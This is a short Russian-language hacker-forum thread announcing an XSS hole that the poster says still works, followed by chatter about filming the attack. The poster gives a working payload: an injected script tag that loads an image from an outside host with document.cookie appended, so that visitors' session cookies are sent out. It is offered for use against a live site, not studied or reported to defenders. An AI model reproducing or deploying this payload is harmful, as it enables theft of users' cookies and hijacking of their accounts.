Найденный уязвимость позволяет удаленныму пользователю своровать cookie пользователей.
Подробно читаем тут (http://csteam.ru/new7.html)
PS. Бага пока реально пашет . КЕЗ если есть возможность сними видео =))) Я не стал т.к потом наехали бы на мой проект ...

XSS:
"><script>i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;</script>

P.S. Только один вопрос: такой подход сработает во всех браузерах?

а может я сниму видео? можно Клез?)

да какое там видео... как в форму сплойт копировать...

И вправду какое там ещё видео делать.....

И вправду какое там ещё видео делать.....Как какое? про то, какв форму сплойт копировать...
=)

как хотите)) а действительно чего сниматть то..

Да Вы заИПали флеймить уже. Всех в бан )))